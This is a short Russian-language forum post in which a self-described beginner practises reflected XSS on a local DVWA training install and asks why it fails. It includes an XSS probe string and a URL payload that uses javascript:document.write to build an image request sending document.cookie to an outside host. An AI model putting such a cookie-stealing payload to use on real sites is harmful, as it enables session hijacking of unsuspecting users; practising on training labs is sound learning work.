В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?

Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.

У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?